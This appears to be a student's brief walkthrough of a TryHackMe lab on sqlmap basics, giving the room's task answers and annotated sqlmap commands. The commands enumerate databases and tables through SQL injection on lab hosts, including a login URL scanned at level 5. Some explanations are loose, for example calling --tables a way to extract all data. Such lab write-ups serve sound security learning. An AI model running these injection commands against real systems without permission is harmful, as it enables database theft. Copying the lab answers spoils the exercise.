https://tryhackme.com/room/sqlmapthebasics\\

First We have an introduction about database

Task 1 :

  1. SQL

Task 2 :

  1. OR
  2. YEA

Task 3 :

  1. extract all databases available ⇒ - - dbs you can look at cheat sheet in last lab or sql injection section
sqlmap -u  <http://sqlmaptesting.thm/search/cat=1> -D members --tables
#explain 
sqlmap => name of tool
-u => because we using url 
 <http://sqlmaptesting.thm/search/cat=1> => vulnerable link
 -D memebers => To use Database called Memebers
 --tables => for extracting all data from tables

i intercepted the request with burp suite after filling the input fields and copy the link in request

Task 4:

  1. we will use :
sqlmap -u http://[machine_ip]/ai/login?email='hacker'& password='12345' --dbs --level=5

We will notice we have 6 databases

image.png

  1. we need to know what’s the name of table in ai database

    sqlmap -u http://[machine_ip]/ai/login?email='hacker'& password='12345' --dbs --level=5 -D ai --tables

we will show the name of table ⇒ user